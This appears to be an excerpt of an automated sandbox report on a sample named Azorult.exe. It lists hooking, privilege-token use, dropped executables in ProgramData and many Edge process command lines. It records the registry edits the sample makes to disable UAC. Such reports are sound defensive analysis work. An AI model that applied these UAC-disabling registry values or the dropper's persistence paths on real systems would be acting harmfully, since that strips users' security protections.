N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\Users\Admin\Downloads\Azorult.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\wini.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\programdata\install\cheat.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\programdata\install\ink.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
N/A N/A C:\programdata\microsoft\intel\P.exe N/A
N/A N/A C:\programdata\microsoft\intel\R8.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\WindowsTask\winlogon.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4936 wrote to memory of 2316 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2316 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 2928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4936 wrote to memory of 1116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

System policy modification

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Downloads\Azorult.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Downloads\Azorult.exe N/A

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20250322_162339.webp

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x314,0x7ffb204ef208,0x7ffb204ef214,0x7ffb204ef220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1732,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=2444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4204,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

